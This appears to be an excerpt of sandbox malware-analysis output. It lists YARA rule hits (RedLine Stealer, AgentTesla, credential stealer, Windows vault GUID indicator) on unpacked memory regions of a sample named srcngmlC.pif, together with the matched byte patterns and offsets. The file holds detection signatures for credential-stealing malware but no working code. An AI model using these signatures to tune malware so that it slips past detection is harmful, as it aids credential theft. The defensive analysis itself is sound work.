12.2.srcngmlC.pif.3eeb5b90.8.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fbcd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fc3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fcc9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fd5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fdc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fe37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fecd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3ff5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.srcngmlC.pif.400000.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.srcngmlC.pif.400000.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.1.srcngmlC.pif.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.1.srcngmlC.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.srcngmlC.pif.31c600c6.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.srcngmlC.pif.31c600c6.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.srcngmlC.pif.31c600c6.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x428b5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x42927:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x429b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x42a43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x42aad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x42b1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x42bb5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x42c45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.srcngmlC.pif.34490ee8.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.srcngmlC.pif.34490ee8.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.srcngmlC.pif.34490ee8.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.srcngmlC.pif.32f65b90.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.srcngmlC.pif.32f65b90.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.srcngmlC.pif.32f65b90.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fbcd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fc3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fcc9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fd5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fdc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fe37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fecd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3ff5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.srcngmlC.pif.34490ee8.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.srcngmlC.pif.34490ee8.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.srcngmlC.pif.34490ee8.8.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fbcd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fc3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fcc9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fd5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fdc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fe37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fecd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3ff5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.srcngmlC.pif.34490000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.srcngmlC.pif.34490000.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.srcngmlC.pif.34490000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x428b5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x42927:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x429b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x42a43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x42aad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x42b1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x42bb5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x42c45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.srcngmlC.pif.32f55b90.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.srcngmlC.pif.32f55b90.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.srcngmlC.pif.32f55b90.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fbcd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fc3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fcc9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fd5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fdc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fe37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fecd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3ff5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.srcngmlC.pif.3da10fae.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.srcngmlC.pif.3da10fae.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.srcngmlC.pif.32f55b90.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.srcngmlC.pif.32f55b90.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.srcngmlC.pif.3da10fae.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fbcd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fc3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fcc9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fd5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fdc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fe37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fecd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3ff5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.srcngmlC.pif.32f55b90.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.srcngmlC.pif.344a0ee8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.srcngmlC.pif.344a0ee8.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.srcngmlC.pif.344a0ee8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.srcngmlC.pif.34490000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.srcngmlC.pif.34490000.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.srcngmlC.pif.34490000.7.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40ab5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x40b27:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40bb1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x40c43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x40cad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40d1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x40db5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x40e45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.srcngmlC.pif.3da100c6.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.srcngmlC.pif.3da100c6.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.srcngmlC.pif.344a0ee8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.srcngmlC.pif.344a0ee8.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.srcngmlC.pif.3da100c6.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x428b5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x42927:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x429b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x42a43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x42aad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x42b1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x42bb5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x42c45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.srcngmlC.pif.344a0ee8.7.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fbcd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fc3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fcc9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fd5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fdc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fe37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fecd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3ff5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.srcngmlC.pif.34c10000.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.srcngmlC.pif.34c10000.9.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.srcngmlC.pif.34c10000.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.srcngmlC.pif.409b0000.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.srcngmlC.pif.409b0000.9.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.srcngmlC.pif.409b0000.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.1.srcngmlC.pif.400000.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
8.1.srcngmlC.pif.400000.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.1.srcngmlC.pif.400000.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.1.srcngmlC.pif.400000.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
8.2.srcngmlC.pif.31bd0fae.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.srcngmlC.pif.31bd0fae.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.srcngmlC.pif.31bd0fae.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.srcngmlC.pif.400000.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.srcngmlC.pif.400000.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
8.2.srcngmlC.pif.34b10000.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.srcngmlC.pif.34b10000.9.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.srcngmlC.pif.34b10000.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.srcngmlC.pif.3dce0ee8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.srcngmlC.pif.3dce0ee8.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.srcngmlC.pif.3dce0ee8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.srcngmlC.pif.3eeb5b90.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.srcngmlC.pif.3eeb5b90.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.srcngmlC.pif.3eeb5b90.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.srcngmlC.pif.3dce0ee8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.srcngmlC.pif.3dce0ee8.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.srcngmlC.pif.3dce0ee8.7.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fbcd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fc3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fcc9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fd5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fdc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fe37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fecd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3ff5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.srcngmlC.pif.344a0000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.srcngmlC.pif.344a0000.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.srcngmlC.pif.344a0000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x428b5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x42927:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x429b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x42a43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x42aad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x42b1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x42bb5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x42c45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.srcngmlC.pif.400000.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.2.srcngmlC.pif.400000.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
8.1.srcngmlC.pif.400000.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
